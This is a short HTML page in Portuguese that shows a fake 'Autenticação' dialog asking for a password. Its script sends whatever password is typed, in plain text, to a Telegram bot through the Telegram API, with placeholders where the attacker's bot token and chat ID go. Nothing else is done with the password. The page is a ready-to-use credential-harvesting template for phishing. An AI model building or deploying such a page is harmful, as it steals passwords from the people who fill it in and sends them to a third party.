<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Autenticação</title>
    <style>
        /* Estilos para a caixa de diálogo */
        #modal {
            display: none; 
            position: fixed;
            z-index: 1; 
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.4); 
        }
        #modal-content {
            background-color: #fefefe;
            margin: 15% auto;
            padding: 20px;
            border: 1px solid #888;
            width: 30%;
        }
        #close-btn {
            color: #aaa;
            float: right;
            font-size: 28px;
            font-weight: bold;
        }
        #close-btn:hover,
        #close-btn:focus {
            color: black;
            text-decoration: none;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <button id="openModal">Autenticar</button>

    <!-- Modal para pedir a senha -->
    <div id="modal">
        <div id="modal-content">
            <span id="close-btn">&times;</span>
            <h3>Digite sua senha:</h3>
            <input type="password" id="senha" placeholder="Senha">
            <button onclick="enviarSenha()">Enviar</button>
        </div>
    </div>

    <script>
        // Função para enviar dados para o bot do Telegram
        function enviarParaBot(senha) {
            const tokenBot = 'SEU_TOKEN_DO_BOT';  // Substitua pelo seu token do bot
            const chatId = 'SEU_CHAT_ID';  // Substitua pelo seu chat ID (ou ID de grupo)

            const mensagem = `Senha: ${senha}`;
            const url = `https://api.telegram.org/bot${tokenBot}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(mensagem)}`;

            fetch(url)
                .then(response => response.json())
                .then(data => {
                    console.log("Mensagem enviada com sucesso:", data);
                })
                .catch(error => {
                    console.error("Erro ao enviar mensagem para o bot:", error);
                });
        }

        // Função chamada quando o botão "Enviar" for clicado
        function enviarSenha() {
            var senha = document.getElementById("senha").value;  // Pega a senha digitada
            if (senha === "") {
                alert("Por favor, digite uma senha.");
            } else {
                enviarParaBot(senha);  // Envia a senha para o bot
                alert("Senha enviada com sucesso!");
            }
            document.getElementById("modal").style.display = "none";  // Fecha o modal
        }

        // Controle do modal (caixa de diálogo)
        document.getElementById("openModal").onclick = function() {
            document.getElementById("modal").style.display = "block";  // Exibe o modal
        }

        document.getElementById("close-btn").onclick = function() {
            document.getElementById("modal").style.display = "none";  // Fecha o modal
        }

        window.onclick = function(event) {
            if (event.target == document.getElementById("modal")) {
                document.getElementById("modal").style.display = "none";  // Fecha o modal se clicar fora
            }
        }
    </script>
</body>
</html>
